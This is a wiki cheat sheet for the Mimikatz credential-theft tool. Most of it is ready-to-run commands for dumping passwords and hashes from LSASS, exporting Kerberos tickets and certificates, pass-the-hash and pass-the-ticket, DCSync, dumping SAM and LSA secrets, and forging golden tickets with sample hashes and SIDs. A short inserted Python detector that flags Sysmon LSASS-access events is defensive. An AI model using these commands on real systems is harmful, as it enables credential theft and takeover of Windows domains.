Mimikatz

From RCATs

Description

Mimikatz[1] is a tool primarily used for reading and extracting plaintext passwords, hashes, and other credentials from memory. It is often used by penetration testers and red teamers to gain access to sensitive data and systems. It can also perform other tasks, such as generating Kerberos tickets and extracting digital certificates.

Links:

https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49

Commands

sekurlsa

# Command is used to extract logon passwords from the Windows Security Support Provider (SSP)
sekurlsa::logonpasswords

# Command will extract all logon passwords, including those of network connections.
sekurlsa::logonPasswords full

# Command will export Kerberos tickets to a file.
sekurlsa::tickets /export

# Command is used to perform a pass-the-hash attack on a Windows system. It attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
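Every sekurlsa:: command above reads credential material out of LSASS memory, which is what a defender can watch for. The following is an added example (not code from the RCATs page or the Mimikatz project) that flags Sysmon Event ID 10 records where a process opens lsass.exe with the memory-read right; the allowlist and all sample events are constructed.

```python
# Added example (not from the RCATs page or the Mimikatz project): flags Sysmon
# Event ID 10 (ProcessAccess) records in which a process opens lsass.exe with
# the memory-read right that sekurlsa::* needs. All sample events are constructed.
PROCESS_VM_READ = 0x0010              # right needed to read credentials from LSASS

# Hypothetical allowlist of processes that legitimately open LSASS on this host.
ALLOWED_SOURCES = {
    r"C:\Windows\System32\csrss.exe",
    r"C:\Program Files\Windows Defender\MsMpEng.exe",
}

# Constructed Sysmon EID 10 records (field names follow the Sysmon schema).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2c4|C:\Windows\SYSTEM32\KERNELBASE.dll+2a6de"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Downloads\m.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2c4|UNKNOWN(0000000001FD10C0)"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Downloads\m.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d2c4"},
]


def lsass_read_access(event):
    """Return why the event looks like an LSASS credential read, or None."""
    if event.get("EventID") != 10:
        return None
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    access = int(event.get("GrantedAccess", "0"), 16)
    if not access & PROCESS_VM_READ:
        return None                       # no memory-read right: not a dump
    if event.get("SourceImage") in ALLOWED_SOURCES:
        return None
    reasons = [f"lsass.exe opened with PROCESS_VM_READ (GrantedAccess 0x{access:04x})"]
    if "UNKNOWN" in event.get("CallTrace", ""):
        reasons.append("call trace has frames outside any loaded module (UNKNOWN)")
    return "; ".join(reasons)


def scan(events):
    """Map each flagged SourceImage to the reason it was flagged."""
    return {e["SourceImage"]: r for e in events if (r := lsass_read_access(e))}


if __name__ == "__main__":
    for src, why in scan(SAMPLE_EVENTS).items():
        print(f"ALERT {src}: {why}")
```

The allowlist must be tuned per host, since EDR agents and some management tools also open LSASS with read access.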

kerberos

# This command will list and export Kerberos tickets to a file.
kerberos::list /export

# This command is used to impersonate a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system. The specified file is used as the TGT.
kerberos::ptt c:\chocolate.kirbi

# This command is used to create a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain. The specified parameters set the properties of the Golden Ticket, such as the administrator account and the domain SID.
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

# This command is used to extract cryptographic information from the CryptoAPI (CAPI) of a Windows system.
crypto::capi

# This command is used to extract cryptographic information from the Cryptography API: Next Generation (CNG) of a Windows system.
crypto::cng

# This command is used to export certificates from a Windows system.
crypto::certificates /export

# This command is used to export certificates from the local machine certificate store of a Windows system.
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

# This command is used to export cryptographic keys from a Windows system.
crypto::keys /export

# This command is used to export cryptographic keys from the local machine of a Windows system.
crypto::keys /machine /export

vault, token & lsadump

# Extracts credentials from the Windows Vault.
vault::cred

# Lists the contents of the Windows Vault.
vault::list

# Elevates the current user's privileges to those of the Local System account.
token::elevate

# Reverts the current user's privileges to their previous state before elevation.
token::revert

# Dumps the Security Account Manager (SAM) database, which stores local user account information.
lsadump::sam

# Dumps the secrets stored in the Local Security Authority (LSA) of a Windows system.
lsadump::secrets

# Dumps the LSA secrets cache, which contains recently used authentication information.
lsadump::cache

# Performs a DCSync attack, which is used to replicate Active Directory data from a domain controller.
lsadump::dcsync /user:domain\krbtgt /domain:lab.local

PTH

# Attempts to authenticate as the specified user with the provided NTLM hash, and runs the specified command.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a

# Attempts to authenticate as the specified user with the provided AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and AES-256 hash.
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

# Attempts to authenticate as the specified user with the provided NTLM hash and runs cmd.exe.
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe

ekeys

# Extracts Kerberos encryption keys (ekeys) from the Local Security Authority Subsystem Service (LSASS) process memory.
sekurlsa::ekeys

dpapi

# Extracts Data Protection API (DPAPI) credentials from the LSASS process memory.
sekurlsa::dpapi

minidump

# Extracts information from a memory dump of the LSASS process.
sekurlsa::minidump lsass.dmp

PTT

# Impersonates a user by passing a Kerberos Ticket Granting Ticket (TGT) to the system.
kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

Golden & Silver Tickets

# Creates a Golden Ticket, which is a forged Kerberos TGT that can be used to authenticate as any user in a specified domain.
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi

tgt

# Extracts Kerberos TGTs from the LSASS process memory.
kerberos::tgt

# Removes TGTs from memory.
kerberos::purge

References